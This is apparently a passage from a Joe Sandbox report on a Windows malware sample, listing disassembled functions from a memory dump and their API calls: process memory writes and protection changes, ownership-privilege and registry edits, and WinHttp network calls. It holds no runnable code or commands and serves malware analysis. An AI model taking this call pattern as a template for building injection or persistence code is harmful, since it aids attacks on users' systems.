Function 00173D50, Relevance: 6.1, APIs: 4, Instructions: 83file

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017D020, Relevance: 6.1, APIs: 4, Instructions: 69registrystring

APIs

lstrlenW.KERNEL32(0017F91F,00000000,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002,-00000002), ref: 0017D03D
RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36), ref: 0017D061
RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D07C
RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D09C

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001780B0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 199

APIs

memset.MSVCRT ref: 00178138
SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001781B5

Strings

SeTakeOwnershipPrivilege, xrefs: 001781F3, 0017822C

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00178320, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,00182FF0,?,00000000), ref: 00178330
WinHttpConnect.WINHTTP(?,?,00182FF0,00000000,00000001,00000000,00000000,00000001,?,00182FF0,?,00000000), ref: 0017835D

Strings

q*\n)W\n, xrefs: 00178330

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00171B70, Relevance: 5.1, APIs: 4, Instructions: 62

APIs

Part of subcall function 00175050: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00188880,?), ref: 0017508D

memset.MSVCRT ref: 00171BA3
memset.MSVCRT ref: 00171BB2

Part of subcall function 00174A60: GetProcAddress.KERNEL32(00000000), ref: 00174AC4
Part of subcall function 00174A60: GetNativeSystemInfo.KERNEL32(00000000), ref: 00174ADA

??2@YAPAXI@Z.MSVCRT ref: 00171BC9
??2@YAPAXI@Z.MSVCRT ref: 00171BE8

Part of subcall function 00181690: wsprintfW.USER32 ref: 00181829
Part of subcall function 00181690: rand.MSVCRT ref: 00181880

Part of subcall function 0017CF80: _time64.MSVCRT ref: 0017CF92
Part of subcall function 0017CF80: _time64.MSVCRT ref: 0017CFD9

Part of subcall function 00172ED0: GetFileAttributesW.KERNELBASE(?,?,?), ref: 00172F1B
Part of subcall function 00172ED0: CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00172F61

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001829C0, Relevance: 5.1, APIs: 4, Instructions: 55

APIs

memset.MSVCRT ref: 001829D8

Part of subcall function 00182870: StrChrW.SHLWAPI(?,0000005C), ref: 001828A3
Part of subcall function 00182870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001828B8
Part of subcall function 00182870: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001828DD
Part of subcall function 00182870: StrChrW.SHLWAPI(?,0000005C), ref: 00182906
Part of subcall function 00182870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 00182921
Part of subcall function 00182870: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 00182946
Part of subcall function 00182870: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 00182962

memset.MSVCRT ref: 00182A05
StrStrW.SHLWAPI(?,0018424C), ref: 00182A22

Part of subcall function 0017F8B0: memset.MSVCRT ref: 0017F8E0
Part of subcall function 0017F8B0: memcpy.MSVCRT ref: 0017F8EB

memset.MSVCRT ref: 00182A47

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017B4D0, Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 552

APIs

GetLastError.KERNEL32(0017CB21,?,?,00002000,00000040,0018011D,001800C1), ref: 0017B53E

Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C

Part of subcall function 0017DC60: VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

memset.MSVCRT ref: 0017B666

Part of subcall function 00171820: GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C

Part of subcall function 00176670: GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

(, xrefs: 0017B6B6

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F0B0, Relevance: 4.7, APIs: 3, Instructions: 175

APIs

Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

??2@YAPAXI@Z.MSVCRT ref: 0017F1C7

Part of subcall function 00177FC0: SysFreeString.OLEAUT32(?), ref: 00177FFB
Part of subcall function 00177FC0: SysAllocString.OLEAUT32(0017F1F6), ref: 00178005

??3@YAXPAX@Z.MSVCRT ref: 0017F206

Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

??3@YAXPAX@Z.MSVCRT ref: 0017F29B

Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4

Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00183543, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11

APIs

__wgetmainargs.MSVCRT ref: 00183567

Strings

(0_, xrefs: 00183558

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00181690, Relevance: 3.2, APIs: 2, Instructions: 215

APIs

Part of subcall function 00173D50: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0
Part of subcall function 00173D50: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

wsprintfW.USER32 ref: 00181829

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

rand.MSVCRT ref: 00181880

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017B61C, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 195

APIs

Part of subcall function 0017DC60: VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 00171820: GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C

Part of subcall function 00176670: GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA

memset.MSVCRT ref: 0017B666

Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C

Strings

(, xrefs: 0017B6B6

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017ADB0, Relevance: 3.2, APIs: 2, Instructions: 177

APIs

??3@YAXPAX@Z.MSVCRT ref: 0017ADEF

Part of subcall function 00172720: ??2@YAPAXI@Z.MSVCRT ref: 0017273D

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

Part of subcall function 00176190: _itow.MSVCRT ref: 001761DE

??3@YAXPAX@Z.MSVCRT ref: 0017AF9A

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 0017A0D0: SysFreeString.OLEAUT32(00000000), ref: 0017A0E1
Part of subcall function 0017A0D0: SysFreeString.OLEAUT32(00000001), ref: 0017A0EB

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00174A60, Relevance: 3.2, APIs: 2, Instructions: 155library

APIs

GetProcAddress.KERNEL32(00000000), ref: 00174AC4
GetNativeSystemInfo.KERNEL32(00000000), ref: 00174ADA

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017B020, Relevance: 3.1, APIs: 2, Instructions: 143

APIs

_wtoi.MSVCRT ref: 0017B047

Part of subcall function 00176190: _itow.MSVCRT ref: 001761DE

_wtoi.MSVCRT ref: 0017B091

Part of subcall function 001743F0: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00174451

Part of subcall function 001789B0: memset.MSVCRT ref: 001789FA
Part of subcall function 001789B0: memset.MSVCRT ref: 00178A0C
Part of subcall function 001789B0: memcpy.MSVCRT ref: 00178F45

Part of subcall function 0017DF10: memcpy.MSVCRT ref: 0017DF48

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00171690: memset.MSVCRT ref: 001716CE

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00175780, Relevance: 3.1, APIs: 2, Instructions: 99

APIs

Part of subcall function 00172530: FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 001725DB
Part of subcall function 00172530: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001726B3
Part of subcall function 00172530: GetLastError.KERNEL32 ref: 001726BD

??2@YAPAXI@Z.MSVCRT ref: 001757D5

Part of subcall function 00173710: SysFreeString.OLEAUT32(?), ref: 00173748
Part of subcall function 00173710: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00173773

Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C

??3@YAXPAX@Z.MSVCRT ref: 0017582F

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017CA10, Relevance: 3.1, APIs: 2, Instructions: 67

APIs

WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 0017CA3D

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 0017CA81

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001735E0, Relevance: 3.1, APIs: 2, Instructions: 66

APIs

Part of subcall function 0017F320: memset.MSVCRT ref: 0017F33E
Part of subcall function 0017F320: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0017F352
Part of subcall function 0017F320: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017F38E

CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
ExitProcess.KERNEL32 ref: 0017368E

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017D8E0, Relevance: 3.1, APIs: 2, Instructions: 61

APIs

SysAllocString.OLEAUT32(00000000), ref: 0017D919
SysFreeString.OLEAUT32(00000000), ref: 0017D94D

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017CF80, Relevance: 3.1, APIs: 2, Instructions: 59

APIs

_time64.MSVCRT ref: 0017CF92
_time64.MSVCRT ref: 0017CFD9

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017CA2E, Relevance: 3.0, APIs: 2, Instructions: 48

APIs

WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 0017CA3D

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 0017CA81

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00171AD0, Relevance: 3.0, APIs: 2, Instructions: 45file

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00177FC0, Relevance: 3.0, APIs: 2, Instructions: 44

APIs

Part of subcall function 00176920: memcpy.MSVCRT ref: 00176A18

SysFreeString.OLEAUT32(?), ref: 00177FFB
SysAllocString.OLEAUT32(0017F1F6), ref: 00178005

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00172ED0, Relevance: 3.0, APIs: 2, Instructions: 44

APIs

